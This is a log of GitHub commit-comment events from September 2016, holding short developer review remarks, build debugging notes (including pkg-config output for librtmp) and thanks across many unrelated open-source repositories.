{"id":"4520420845","type":"CommitCommentEvent","actor":{"login":"jayfk"},"repo":{"name":"pydanny/cookiecutter-django"},"payload":{"comment":{"id":18908724,"position":null,"line":null,"path":null,"commit_id":"c5e984cf2365dba59061b930fe5fa14571c25659","created_at":"2016-09-06T10:13:45Z","updated_at":"2016-09-06T10:13:45Z","body":"@shanx That's correct. Time to open a PR?"}},"created_at":"2016-09-06T10:13:45Z"}
{"id":"4520422209","type":"CommitCommentEvent","actor":{"login":"najidagher"},"repo":{"name":"dinosaadeh/Barjis"},"payload":{"comment":{"id":18908726,"position":71,"line":116,"path":"core/src/com/smb215team/barjis/game/objects/Pawn.java","commit_id":"08716faae207e923350e6234b8c5a8f45520aea2","created_at":"2016-09-06T10:14:04Z","updated_at":"2016-09-06T10:14:04Z","body":"Position are already set in the config file, however  u should specify what part of the triangle should be in that predefined position. 0.12/2 & 0.14/2 means that the center of the triangle should be on the predefined position.\n\nSent from my iPhone\n\n> On Sep 6, 2016, at 12:27 PM, Mohieddine SAADEH (Dino for short) <notifications@github.com> wrote:\n> \n> the positions are set already in configuration.xml no?\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n> \n"}},"created_at":"2016-09-06T10:14:04Z"}
{"id":"4520424025","type":"CommitCommentEvent","actor":{"login":"cursey"},"repo":{"name":"cursey/kanan"},"payload":{"comment":{"id":18908729,"position":null,"line":null,"path":null,"commit_id":"7118b066fbfd5fc5beab8d39ecbaa0c4f5d7ae27","created_at":"2016-09-06T10:14:27Z","updated_at":"2016-09-06T10:14:27Z","body":"No, it should be 0. -1 is `SOCKET_ERROR` and according to the documentation the error information should be retrieved by `WSAGetLastError()`. But 0 is not a valid error from `WSAGetLastError()`..."}},"created_at":"2016-09-06T10:14:27Z"}
{"id":"4520424063","type":"CommitCommentEvent","actor":{"login":"tkisme"},"repo":{"name":"vokins/yhosts"},"payload":{"comment":{"id":18908730,"position":null,"line":null,"path":null,"commit_id":"7445e35d4ebaaf12562e862bf1907432074a2990","created_at":"2016-09-06T10:14:27Z","updated_at":"2016-09-06T10:14:27Z","body":"233,什么仇什么怨"}},"created_at":"2016-09-06T10:14:27Z"}
{"id":"4520437380","type":"CommitCommentEvent","actor":{"login":"antpovzner"},"repo":{"name":"ewedel/pebble-sunclock"},"payload":{"comment":{"id":18908754,"position":null,"line":null,"path":null,"commit_id":"ec1a34366fbfec64d31e08b7658dad9ce0ea89d7","created_at":"2016-09-06T10:17:27Z","updated_at":"2016-09-06T10:17:27Z","body":"Thank you!"}},"created_at":"2016-09-06T10:17:27Z"}
{"id":"4520439708","type":"CommitCommentEvent","actor":{"login":"donperi"},"repo":{"name":"donperi/cached_counts"},"payload":{"comment":{"id":18908756,"position":null,"line":null,"path":null,"commit_id":"ceb48c2604e0fbb28a29ddec407300555b0094d8","created_at":"2016-09-06T10:17:58Z","updated_at":"2016-09-06T10:17:58Z","body":"lol, I don't remember why I did this. This was long time ago and I don't work anymore in the project I used this gem.\r\n\r\nLooking at it. It doesn't make sense."}},"created_at":"2016-09-06T10:17:58Z"}
{"id":"4520441679","type":"CommitCommentEvent","actor":{"login":"hsluoyz"},"repo":{"name":"nmap/npcap"},"payload":{"comment":{"id":18908761,"position":null,"line":null,"path":null,"commit_id":"87b126d6c9887bb05f0164953f1eb89a4888c56e","created_at":"2016-09-06T10:18:25Z","updated_at":"2016-09-06T10:18:25Z","body":"Vista's support has been added back in Npcap ``0.09 r3``. Please try it at: https://github.com/nmap/npcap/releases/"}},"created_at":"2016-09-06T10:18:25Z"}
{"id":"4520441997","type":"CommitCommentEvent","actor":{"login":"vanderGoes"},"repo":{"name":"part-up/part-up"},"payload":{"comment":{"id":18908762,"position":null,"line":null,"path":null,"commit_id":"64b12b0e076c46d29cb061b5a0594b401198ab2b","created_at":"2016-09-06T10:18:29Z","updated_at":"2016-09-06T10:18:29Z","body":"What is this?"}},"created_at":"2016-09-06T10:18:29Z"}
{"id":"4520444506","type":"CommitCommentEvent","actor":{"login":"dragotin"},"repo":{"name":"owncloud/client"},"payload":{"comment":{"id":18908771,"position":null,"line":null,"path":null,"commit_id":"af9c4d0e2fe1a42e1faf14779ca5ef1088bd1314","created_at":"2016-09-06T10:19:06Z","updated_at":"2016-09-06T10:19:06Z","body":":+1: "}},"created_at":"2016-09-06T10:19:06Z"}
{"id":"4520449310","type":"CommitCommentEvent","actor":{"login":"MilhouseVH"},"repo":{"name":"notspiff/inputstream.rtmp"},"payload":{"comment":{"id":18908781,"position":4,"line":10,"path":"CMakeLists.txt","commit_id":"e5e4cee142c6614664448318c7b3df3b3809930e","created_at":"2016-09-06T10:20:13Z","updated_at":"2016-09-06T10:20:13Z","body":"That's already there:\r\n```\r\nif(PKG_CONFIG_FOUND)\r\n  pkg_check_modules (RTMP librtmp)\r\n  list(APPEND RTMP_INCLUDE_DIRS ${RTMP_INCLUDEDIR})\r\n```\r\nThe problem with the above is that `pkg_check_modules (RTMP librtmp)` appears to be working - it finds librtmp - but it isn't setting any variables, so `RTMP_INCLUDEDIR` is blank which leads to `RTMP_INCLUDE_DIRS` being blank.\r\n\r\nThe thing is this is now new behaviour with LibreELEC, as previously `PKG_CONFIG_FOUND` would never be set, but now it is.\r\n\r\nIn addition, the `find_package(ZLIB REQUIRED)` (in your next commit) doesn't set `PKG_CONFIG_FOUND` - it's only the `find_package(OpenSSL REQUIRED)` call that is setting `PKG_CONFIG_FOUND`, for some reason."}},"created_at":"2016-09-06T10:20:13Z"}
{"id":"4520450167","type":"CommitCommentEvent","actor":{"login":"hroncok"},"repo":{"name":"frenzymadness/content"},"payload":{"comment":{"id":18908783,"position":109,"line":120,"path":"tech/languages/python/micropython.md","commit_id":"f021d925c4500c972e904da3354c95a65a41a09d","created_at":"2016-09-06T10:20:23Z","updated_at":"2016-09-06T10:20:23Z","body":"Make it the first option (if it actually works). Also suggest logging out an in again after the command."}},"created_at":"2016-09-06T10:20:23Z"}
{"id":"4520450532","type":"CommitCommentEvent","actor":{"login":"mzhelskiy"},"repo":{"name":"mgp25/Instagram-API"},"payload":{"comment":{"id":18908785,"position":32,"line":753,"path":"src/Instagram.php","commit_id":"a2831c4c087845f43577f7925f80a2f953d35bda","created_at":"2016-09-06T10:20:28Z","updated_at":"2016-09-06T10:20:28Z","body":"error?"}},"created_at":"2016-09-06T10:20:28Z"}
{"id":"4520450955","type":"CommitCommentEvent","actor":{"login":"1vanK"},"repo":{"name":"urho3d/Urho3D"},"payload":{"comment":{"id":18908788,"position":null,"line":null,"path":null,"commit_id":"48f779e234b4cf6f2429e1456935412731950ef8","created_at":"2016-09-06T10:20:33Z","updated_at":"2016-09-06T10:20:33Z","body":"I think note about reasons, why materials without alphamask should be rendered first, is important (and it is necessary to return).\r\n\r\nIt would also be good to add more info about renderorder to https://urho3d.github.io/documentation/HEAD/_materials.html  (lowest values rendered first, default value is 128)"}},"created_at":"2016-09-06T10:20:33Z"}
{"id":"4520460007","type":"CommitCommentEvent","actor":{"login":"vmassol"},"repo":{"name":"xwiki/jodconverter"},"payload":{"comment":{"id":18908808,"position":4,"line":53,"path":"jodconverter-core/pom.xml","commit_id":"74b2d7c5598e490b7cb017df82bd92fd66c9cb0b","created_at":"2016-09-06T10:22:32Z","updated_at":"2016-09-06T10:22:32Z","body":"I hope this doesn't mean it's not going to work anymore with older LO versions."}},"created_at":"2016-09-06T10:22:32Z"}
{"id":"4520462146","type":"CommitCommentEvent","actor":{"login":"akva2"},"repo":{"name":"notspiff/inputstream.rtmp"},"payload":{"comment":{"id":18908813,"position":4,"line":10,"path":"CMakeLists.txt","commit_id":"e5e4cee142c6614664448318c7b3df3b3809930e","created_at":"2016-09-06T10:23:02Z","updated_at":"2016-09-06T10:23:02Z","body":"(sorry for hopping users all the time..)\r\n\r\nyes, the reason for that is that the built-in OpenSSL cmake rule locates pkg-config for us. actually it was a bug that i never did that earlier. you must have some borked librtmp.pc file then ? maybe i have to eat it and do like @fetzerch does in his rules - don't trust pkg-config."}},"created_at":"2016-09-06T10:23:02Z"}
{"id":"4520471898","type":"CommitCommentEvent","actor":{"login":"athityakumar"},"repo":{"name":"metakgp/mfqp-source"},"payload":{"comment":{"id":18908847,"position":null,"line":null,"path":null,"commit_id":"e0c5c442203ae0dee1815a992b12abfd3fdde864","created_at":"2016-09-06T10:25:14Z","updated_at":"2016-09-06T10:25:14Z","body":"Solves issue #14 "}},"created_at":"2016-09-06T10:25:14Z"}
{"id":"4520473217","type":"CommitCommentEvent","actor":{"login":"lujun9972"},"repo":{"name":"lujun9972/org-preview-html"},"payload":{"comment":{"id":18908850,"position":null,"line":null,"path":null,"commit_id":"bcf9f9abca0aa458ba018e0914112b4ec450ce82","created_at":"2016-09-06T10:25:30Z","updated_at":"2016-09-06T10:25:30Z","body":"Thank you for your support.\r\nJust do what you think good. :smile: "}},"created_at":"2016-09-06T10:25:30Z"}
{"id":"4520482518","type":"CommitCommentEvent","actor":{"login":"DavidKarlas"},"repo":{"name":"mono/monodevelop"},"payload":{"comment":{"id":18908882,"position":null,"line":null,"path":null,"commit_id":"6620b0bef2eabcfb268bc8b989e1b9dd95a824fa","created_at":"2016-09-06T10:27:30Z","updated_at":"2016-09-06T10:27:30Z","body":"👍 We should also consider setting `SetMinThreads` to something like 32, to avoid climbing slowness... But last time I checked setting that on Mono had no effect... :("}},"created_at":"2016-09-06T10:27:30Z"}
{"id":"4520493088","type":"CommitCommentEvent","actor":{"login":"CybotTM"},"repo":{"name":"mogic-le/timetracker"},"payload":{"comment":{"id":18908902,"position":138,"line":105,"path":"src/Netresearch/TimeTrackerBundle/Helper/JiraUserApi.php","commit_id":"96401d7430823dde1b7d676b2ec219f56dd45ced","created_at":"2016-09-06T10:29:53Z","updated_at":"2016-09-06T10:29:53Z","body":"\"phpDocumentor shows a listing of errors thrown by the documented element\" and does not include the ones from called elements.\r\n\r\nYou cannot document every throwable by every method/function you call in this element - otherwise you would need to update every documentation upstream if you change throwables in any lib - or if any lib you use changes, you would need to update every docblock in your code - everytime you update any of your libs, or change PHP version"}},"created_at":"2016-09-06T10:29:53Z"}
{"id":"4520499960","type":"CommitCommentEvent","actor":{"login":"KneeArrow"},"repo":{"name":"KneeArrow/onekeyshadowsocks"},"payload":{"comment":{"id":18908909,"position":null,"line":null,"path":null,"commit_id":"82264746453adc4c7758cce83d8c146e492c595c","created_at":"2016-09-06T10:31:27Z","updated_at":"2016-09-06T10:31:27Z","body":"更新ss脚本，更新安装顺序"}},"created_at":"2016-09-06T10:31:27Z"}
{"id":"4520502812","type":"CommitCommentEvent","actor":{"login":"ishantvivek"},"repo":{"name":"SandPox/android_device_samsung_js01ltedcm"},"payload":{"comment":{"id":18908912,"position":72,"line":380,"path":"proprietary-files.txt","commit_id":"eb5bd386d3a993972a0be3e62e5ad47fb5a199e4","created_at":"2016-09-06T10:32:05Z","updated_at":"2016-09-06T10:32:05Z","body":"Doesn't it get repeated 2 times? Or it's just me? "}},"created_at":"2016-09-06T10:32:05Z"}
{"id":"4520510116","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":18908926,"position":5,"line":691,"path":"application/helpers/replacements_helper.php","commit_id":"b1c10d5d9f5f4f0e482c071bce787aee3864bdad","created_at":"2016-09-06T10:33:44Z","updated_at":"2016-09-06T10:33:44Z","body":"Some still not done https://bugs.limesurvey.org/view.php?id=10827\r\n\r\nIn fact answers in List type are not in Expression Manager : then no PHP control."}},"created_at":"2016-09-06T10:33:44Z"}
{"id":"4520511458","type":"CommitCommentEvent","actor":{"login":"ndechesne"},"repo":{"name":"cpriouzeau/meta-st-cannes2"},"payload":{"comment":{"id":18908929,"position":null,"line":null,"path":null,"commit_id":"e0e9cfbb4c05b95b4bf3f733528d912c79636253","created_at":"2016-09-06T10:34:02Z","updated_at":"2016-09-06T10:34:02Z","body":"when this layer is pulled in a multi BSP config (such as RPB) the bbappend will be forced on every machine, and that seems wrong. You need to make sure that any setting you are going to apply will apply to your machine only."}},"created_at":"2016-09-06T10:34:02Z"}
{"id":"4520514215","type":"CommitCommentEvent","actor":{"login":"cadaver"},"repo":{"name":"urho3d/Urho3D"},"payload":{"comment":{"id":18908934,"position":null,"line":null,"path":null,"commit_id":"48f779e234b4cf6f2429e1456935412731950ef8","created_at":"2016-09-06T10:34:37Z","updated_at":"2016-09-06T10:34:37Z","body":"Note added to the place in docs where renderorder parameter is explained."}},"created_at":"2016-09-06T10:34:37Z"}
{"id":"4520515444","type":"CommitCommentEvent","actor":{"login":"aesinv"},"repo":{"name":"Citytechinc/aws-lambda-toolkit"},"payload":{"comment":{"id":18908940,"position":null,"line":null,"path":null,"commit_id":"23044e054a0d0a92e011b182713f0b2648af5fcf","created_at":"2016-09-06T10:34:53Z","updated_at":"2016-09-06T10:34:53Z","body":"Fixes issue #1."}},"created_at":"2016-09-06T10:34:53Z"}
{"id":"4520518915","type":"CommitCommentEvent","actor":{"login":"Jyrsa"},"repo":{"name":"CSC-IT-Center-for-Science/pouta-blueprints"},"payload":{"comment":{"id":18908949,"position":null,"line":null,"path":null,"commit_id":"7581ee9c3a090eb874227f10a4359c7b55a75c3f","created_at":"2016-09-06T10:35:42Z","updated_at":"2016-09-06T10:35:42Z","body":"Thought I'd fix it better while we're at it."}},"created_at":"2016-09-06T10:35:42Z"}
{"id":"4520527235","type":"CommitCommentEvent","actor":{"login":"konradmachynia"},"repo":{"name":"tomekkaczmarczyk/Sklep"},"payload":{"comment":{"id":18908969,"position":52,"line":44,"path":"index.php","commit_id":"4d29000f1d899b4d39be333583860a291223dffd","created_at":"2016-09-06T10:37:26Z","updated_at":"2016-09-06T10:37:26Z","body":"Bez kitu"}},"created_at":"2016-09-06T10:37:26Z"}
{"id":"4520541047","type":"CommitCommentEvent","actor":{"login":"onlinehuazai"},"repo":{"name":"onlinehuazai/onlineweb"},"payload":{"comment":{"id":18909004,"position":null,"line":null,"path":null,"commit_id":"3184c6485d51bb576ad2b2f9c1d8d6e79b7e2a73","created_at":"2016-09-06T10:40:37Z","updated_at":"2016-09-06T10:40:37Z","body":"第一周学习心得"}},"created_at":"2016-09-06T10:40:37Z"}
{"id":"4520545466","type":"CommitCommentEvent","actor":{"login":"MilhouseVH"},"repo":{"name":"notspiff/inputstream.rtmp"},"payload":{"comment":{"id":18909015,"position":4,"line":10,"path":"CMakeLists.txt","commit_id":"e5e4cee142c6614664448318c7b3df3b3809930e","created_at":"2016-09-06T10:41:40Z","updated_at":"2016-09-06T10:41:40Z","body":"> you must have some borked librtmp.pc file then ?\r\n\r\n```\r\nneil@nm-linux:~/projects/LibreELEC.tv/build.LibreELEC-RPi2.arm-8.0-devel$ pkg-config librtmp --modversion\r\nv2.4\r\nneil@nm-linux:~/projects/LibreELEC.tv/build.LibreELEC-RPi2.arm-8.0-devel$ pkg-config librtmp --print-variables\r\nexec_prefix\r\nincdir\r\nlibdir\r\npcfiledir\r\nprefix\r\nneil@nm-linux:~/projects/LibreELEC.tv/build.LibreELEC-RPi2.arm-8.0-devel$ pkg-config librtmp --variable=incdir\r\n/usr/include\r\nneil@nm-linux:~/projects/LibreELEC.tv/build.LibreELEC-RPi2.arm-8.0-devel$ pkg-config librtmp --variable=libdir\r\n/usr/lib/x86_64-linux-gnu\r\nneil@nm-linux:~/projects/LibreELEC.tv/build.LibreELEC-RPi2.arm-8.0-devel$ pkg-config librtmp --variable=prefix\r\n/usr\r\n```\r\nI guess so, or it's a consequence of cross-compiling as the pkg-config route in `FindRTMP.cmake` hasn't been used before when building `inputstream.rtmp` with LibreELEC, in which case simply not trusting pkg-config works just fine for LibreELEC! :)\r\n\r\nAccording to the cmake documentation, PKG_CONFIG_FOUND will be set when the `pkg-config` executable is found (and it obviously exists on the LibreELEC host system) but in this case we don't want/need to use it..."}},"created_at":"2016-09-06T10:41:40Z"}
{"id":"4520549581","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/cura-build-environment"},"payload":{"comment":{"id":18909024,"position":20,"line":20,"path":"projects/numpy.cmake","commit_id":"5762b5ef54f2e6bba13cae99616ce1e29be57d65","created_at":"2016-09-06T10:42:39Z","updated_at":"2016-09-06T10:42:39Z","body":"This hash is more for security than for checksumming, right? TCP does checksumming for us. I understood it is meant to prevent downloading malicious software if the remote source is compromised."}},"created_at":"2016-09-06T10:42:39Z"}
{"id":"4520549728","type":"CommitCommentEvent","actor":{"login":"sagarkarira"},"repo":{"name":"sagarkarira/glubot"},"payload":{"comment":{"id":18909025,"position":null,"line":null,"path":null,"commit_id":"1e34111e9583c23f5786e4601a6fc9a01beeb4f7","created_at":"2016-09-06T10:42:41Z","updated_at":"2016-09-06T10:42:41Z","body":"You are write it seems that nicks.json was deleted accidentally. "}},"created_at":"2016-09-06T10:42:41Z"}
{"id":"4520550407","type":"CommitCommentEvent","actor":{"login":"LeoHeo"},"repo":{"name":"velopert/react-codelab-fundamentals"},"payload":{"comment":{"id":18909027,"position":null,"line":null,"path":null,"commit_id":"b8d2b5cd2cae483d35c0121b2481e5495cc5e29a","created_at":"2016-09-06T10:42:51Z","updated_at":"2016-09-06T10:42:51Z","body":"강좌 3-3편: Hot Module Replacement를 보다가 강의대로 따라하고\r\n\r\n`npm run dev-server`하고 나니 아래와 같은 오류가 있었습니다.\r\n\r\n```\r\nModule build failed: Error: React Hot Loader: The Webpack loader is now exported separately. If you use Babel, we recommend that you remove \"react-hot-loader\" from the \"loaders\" section of your Webpack configuration altogether, and instead add \"react-hot-loader/babel\" to the \"plugins\" section of your .babelrc file. If you prefer not to use Babel, replace \"react-hot-loader\" or \"react-hot\" with \"react-hot-loader/webpack\" in the \"loaders\" section of your Webpack configuration.\r\n```\r\n\r\n그래서 혹시나 하고 들어와봤는데 역시 해결법이 있군요!!! 감사합니다!!!"}},"created_at":"2016-09-06T10:42:51Z"}
{"id":"4520551666","type":"CommitCommentEvent","actor":{"login":"karannaoh"},"repo":{"name":"karannaoh/sac"},"payload":{"comment":{"id":18909031,"position":null,"line":null,"path":null,"commit_id":"7c26ea0f17bc80a978057b7cc91654eaa8894152","created_at":"2016-09-06T10:43:12Z","updated_at":"2016-09-06T10:43:12Z","body":"fork update"}},"created_at":"2016-09-06T10:43:12Z"}
{"id":"4520554637","type":"CommitCommentEvent","actor":{"login":"andrewpbrett"},"repo":{"name":"beeminder/beebot"},"payload":{"comment":{"id":18909038,"position":null,"line":null,"path":null,"commit_id":"8ab12a6d172341cae8119f9a3589409506cbd1da","created_at":"2016-09-06T10:43:57Z","updated_at":"2016-09-06T10:43:57Z","body":"I don't think this will work as written since you're not invoking this `handleMessage` function anywhere. Also I don't know why you would want this to happen. What if you're discussing a game of bridge or hearts? "}},"created_at":"2016-09-06T10:43:57Z"}
{"id":"4520554890","type":"CommitCommentEvent","actor":{"login":"obadz"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18909040,"position":null,"line":null,"path":null,"commit_id":"0aa75206705afc71b991cceeede644c87088d583","created_at":"2016-09-06T10:44:01Z","updated_at":"2016-09-06T10:44:01Z","body":"I personally disagree that everything that's installed should necessarily be in the path.\r\n\r\nMore importantly, I think explicit paths in scripts are better than relying on stuff being installed (nixos-install can also run on non-NixOS systems) and this revert is now causing the ova test failure: http://hydra.nixos.org/build/39960547\r\n\r\nI'll leave rsync in nixos/modules/config/system-path.nix since that is your wish but I'll make the paths explicit again to fix test failure if that's ok."}},"created_at":"2016-09-06T10:44:01Z"}
{"id":"4520557661","type":"CommitCommentEvent","actor":{"login":"andrewpbrett"},"repo":{"name":"beeminder/beebot"},"payload":{"comment":{"id":18909045,"position":null,"line":null,"path":null,"commit_id":"8ab12a6d172341cae8119f9a3589409506cbd1da","created_at":"2016-09-06T10:44:45Z","updated_at":"2016-09-06T10:44:45Z","body":"Can we revert until it's tested in order to keep master clean? @dreeves "}},"created_at":"2016-09-06T10:44:45Z"}
{"id":"4520560284","type":"CommitCommentEvent","actor":{"login":"akva2"},"repo":{"name":"notspiff/inputstream.rtmp"},"payload":{"comment":{"id":18909049,"position":4,"line":10,"path":"CMakeLists.txt","commit_id":"e5e4cee142c6614664448318c7b3df3b3809930e","created_at":"2016-09-06T10:45:23Z","updated_at":"2016-09-06T10:45:23Z","body":"actually i seem to recall that the pc file from vanilla librtmp is utterly borked, and debian / ubuntu patch it into shape. i'll add validation of the info from pkg-config.. soon. need to do stuff that puts food on the table right now."}},"created_at":"2016-09-06T10:45:23Z"}
{"id":"4520571260","type":"CommitCommentEvent","actor":{"login":"cydh"},"repo":{"name":"OpenKore/openkore"},"payload":{"comment":{"id":18909060,"position":4,"line":33,"path":"src/Network/Receive/idRO.pm","commit_id":"39468cdcddd4705ea9052d5552ac7d02e4eeef0b","created_at":"2016-09-06T10:48:01Z","updated_at":"2016-09-06T10:48:01Z","body":"this change shouldn't be here anymore since https://github.com/OpenKore/openkore/commit/8f03607db86284e9513457428df432c578deb8dc#diff-27bcd83aae5e5fef3706cc3a14115cdcR562\r\n\r\nRemove this line please @itsrachelfish "}},"created_at":"2016-09-06T10:48:01Z"}
{"id":"4520573285","type":"CommitCommentEvent","actor":{"login":"nastylia"},"repo":{"name":"nastylia/ror_beginner_exercises"},"payload":{"comment":{"id":18909063,"position":17,"line":17,"path":"lesson9/acessors.rb","commit_id":"4bef857bc276179653ec23f18d6879c545e4ae52","created_at":"2016-09-06T10:48:31Z","updated_at":"2016-09-06T10:48:31Z","body":"@vkurennov\r\nБуду пробовать отстоять свое решение - потому что история у меня работает :)\r\nв 21 строке я сначала вызываю метод history_get:\r\nsend(history_get).\r\nЕсли там ничего нет, то вернется пустой массив. Потом добавляю туда значение:\r\nsend(history_get) << value\r\nА потом сохраняю опять в переменной history_name с помощью instance_variable_set:\r\ninstance_variable_set(history_name, send(history_get) << value)\r\n\r\n\r\nПолучается, что когда я следующий раз обращаюсь к history_get методу, то он вернет не пустой массив, а уже существующий массив со значением, так как я его сохранила в history_name  в строке 21.\r\n\r\nпо-моему же все верно? или я что-то не понимаю))"}},"created_at":"2016-09-06T10:48:31Z"}
{"id":"4520578358","type":"CommitCommentEvent","actor":{"login":"mutoulazy"},"repo":{"name":"mutoulazy/test"},"payload":{"comment":{"id":18909071,"position":null,"line":null,"path":null,"commit_id":"dff930bed2cfab463b396ff16ca1b708b0e13d35","created_at":"2016-09-06T10:49:47Z","updated_at":"2016-09-06T10:49:47Z","body":"再加一条？"}},"created_at":"2016-09-06T10:49:47Z"}
{"id":"4520579656","type":"CommitCommentEvent","actor":{"login":"cursey"},"repo":{"name":"cursey/kanan"},"payload":{"comment":{"id":18909074,"position":null,"line":null,"path":null,"commit_id":"7118b066fbfd5fc5beab8d39ecbaa0c4f5d7ae27","created_at":"2016-09-06T10:50:06Z","updated_at":"2016-09-06T10:50:06Z","body":"Please test the new version."}},"created_at":"2016-09-06T10:50:06Z"}
{"id":"4520588734","type":"CommitCommentEvent","actor":{"login":"michalplatek"},"repo":{"name":"ketjow4/NOV"},"payload":{"comment":{"id":18909088,"position":null,"line":null,"path":null,"commit_id":"1eaec7529ccfd6bf1d311cae228f556594100a8f","created_at":"2016-09-06T10:52:18Z","updated_at":"2016-09-06T10:52:18Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;XtY7SJEZ&#x2F;270-trello-github\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Trello + github</a>"}},"created_at":"2016-09-06T10:52:18Z"}
{"id":"4520591179","type":"CommitCommentEvent","actor":{"login":"obadz"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18909094,"position":null,"line":null,"path":null,"commit_id":"0aa75206705afc71b991cceeede644c87088d583","created_at":"2016-09-06T10:52:52Z","updated_at":"2016-09-06T10:52:52Z","body":"Btw one argument to remove rsync from path now is so that nobody is surprised when we drop it when `nix copy` comes around.\r\n\r\nAlso fyi 16.09 was forked without rsync.\r\n\r\nSee partial revert 3f1ceae"}},"created_at":"2016-09-06T10:52:52Z"}
{"id":"4520593359","type":"CommitCommentEvent","actor":{"login":"hvr"},"repo":{"name":"haskell/cabal"},"payload":{"comment":{"id":18909100,"position":null,"line":null,"path":null,"commit_id":"3c07aa1e19a3db219569c5cef9a14a093afced39","created_at":"2016-09-06T10:53:24Z","updated_at":"2016-09-06T10:53:24Z","body":"@23Skidoo sorry, I wanted to, but forgot... I wonder if I could come up with a local git hook that would remind me to if I only change .md/.rst files"}},"created_at":"2016-09-06T10:53:24Z"}
{"id":"4520594351","type":"CommitCommentEvent","actor":{"login":"sipa"},"repo":{"name":"TheBlueMatt/bips"},"payload":{"comment":{"id":18909103,"position":9,"line":114,"path":"bip-0152.mediawiki","commit_id":"7059fd119f779cd87c4c44fa16ff98e080be5181","created_at":"2016-09-06T10:53:40Z","updated_at":"2016-09-06T10:53:40Z","body":"Perhaps make an exception here for `sendcmpct` messages with a version number that have been sent before, solely to change the direct announcement request or not?"}},"created_at":"2016-09-06T10:53:40Z"}
{"id":"4520600715","type":"CommitCommentEvent","actor":{"login":"Dagarman"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":18909123,"position":null,"line":null,"path":null,"commit_id":"9ba12217b39fd908cb0d226cb8f4dbdfa7a8d77c","created_at":"2016-09-06T10:55:15Z","updated_at":"2016-09-06T10:55:15Z","body":"Thanks, I didn't intend to delete those comments from the commit so thanks for putting them back in. I'll pay better attention to detail as I try to teach myself this coding stuff."}},"created_at":"2016-09-06T10:55:15Z"}
{"id":"4520602324","type":"CommitCommentEvent","actor":{"login":"idesign-sites"},"repo":{"name":"idesign-sites/idesign.github.io"},"payload":{"comment":{"id":18909129,"position":null,"line":null,"path":null,"commit_id":"0bc3b2e18264f69efa9d322206281a671c91001c","created_at":"2016-09-06T10:55:39Z","updated_at":"2016-09-06T10:55:39Z","body":"."}},"created_at":"2016-09-06T10:55:39Z"}
{"id":"4520602326","type":"CommitCommentEvent","actor":{"login":"InYanIn"},"repo":{"name":"ReportChef/List-of-best-Slack-Teams"},"payload":{"comment":{"id":18909130,"position":4,"line":1194,"path":"README.md","commit_id":"2d9ca46396c55b6c26f0afe9da4c6b9bee814bb8","created_at":"2016-09-06T10:55:39Z","updated_at":"2016-09-06T10:55:39Z","body":"xvbxb"}},"created_at":"2016-09-06T10:55:39Z"}
{"id":"4520607766","type":"CommitCommentEvent","actor":{"login":"andrea2107"},"repo":{"name":"nofearnohappy/kernel_6.0_hermes"},"payload":{"comment":{"id":18909148,"position":null,"line":null,"path":null,"commit_id":"7e7e3eeb472af4696a3f1a7ccf57e7806a780e4c","created_at":"2016-09-06T10:56:56Z","updated_at":"2016-09-06T10:56:56Z","body":"nice! but...you didn't upload the fixed source,you just changed the readme :P "}},"created_at":"2016-09-06T10:56:56Z"}
{"id":"4520608215","type":"CommitCommentEvent","actor":{"login":"mikesteez"},"repo":{"name":"uppsala-university/ladok"},"payload":{"comment":{"id":18909152,"position":null,"line":null,"path":null,"commit_id":"9b4e7cfbeee2fd5ba9b36cc453464df28d4ab933","created_at":"2016-09-06T10:57:03Z","updated_at":"2016-09-06T10:57:03Z","body":"Modul2007GrundAvancerad är tyvärr deprecated och kan inte användas. /Mikael - Ladok3-projektet"}},"created_at":"2016-09-06T10:57:03Z"}
{"id":"4520610143","type":"CommitCommentEvent","actor":{"login":"Vivek1010"},"repo":{"name":"Vivek1010/python_scripts"},"payload":{"comment":{"id":18909157,"position":null,"line":null,"path":null,"commit_id":"558604269e423b89bb1b0c054d9c350b605a0fcd","created_at":"2016-09-06T10:57:29Z","updated_at":"2016-09-06T10:57:29Z","body":"Script to double commit"}},"created_at":"2016-09-06T10:57:29Z"}
{"id":"4520614092","type":"CommitCommentEvent","actor":{"login":"idesign-sites"},"repo":{"name":"idesign-sites/idesign.github.io"},"payload":{"comment":{"id":18909165,"position":null,"line":null,"path":null,"commit_id":"0bc3b2e18264f69efa9d322206281a671c91001c","created_at":"2016-09-06T10:58:26Z","updated_at":"2016-09-06T10:58:26Z","body":"."}},"created_at":"2016-09-06T10:58:26Z"}
{"id":"4520616807","type":"CommitCommentEvent","actor":{"login":"sbmpost"},"repo":{"name":"thenewmotion/ocpp"},"payload":{"comment":{"id":18909174,"position":60,"line":60,"path":"ocpp-json/src/main/scala/com/thenewmotion/ocpp/json/OcppMessageEncryptor.scala","commit_id":"e678fe1480a07082d56a88a114a7e67dd808f680","created_at":"2016-09-06T10:59:06Z","updated_at":"2016-09-06T10:59:06Z","body":"Probably we should be handling this differently?"}},"created_at":"2016-09-06T10:59:06Z"}
{"id":"4520618879","type":"CommitCommentEvent","actor":{"login":"sbmpost"},"repo":{"name":"thenewmotion/ocpp"},"payload":{"comment":{"id":18909180,"position":34,"line":34,"path":"ocpp-json/src/main/scala/com/thenewmotion/ocpp/json/OcppMessageEncryptor.scala","commit_id":"e678fe1480a07082d56a88a114a7e67dd808f680","created_at":"2016-09-06T10:59:35Z","updated_at":"2016-09-06T10:59:35Z","body":"Probably should be logger.debug?"}},"created_at":"2016-09-06T10:59:35Z"}
{"id":"4520619065","type":"CommitCommentEvent","actor":{"login":"manpenaloza"},"repo":{"name":"manpenaloza/academy"},"payload":{"comment":{"id":18909181,"position":null,"line":null,"path":null,"commit_id":"132fcb6343b379cbe48d0158895e65ac7c977200","created_at":"2016-09-06T10:59:39Z","updated_at":"2016-09-06T10:59:39Z","body":"switched term \"this\" to \"these\" due to grammar reasons"}},"created_at":"2016-09-06T10:59:39Z"}
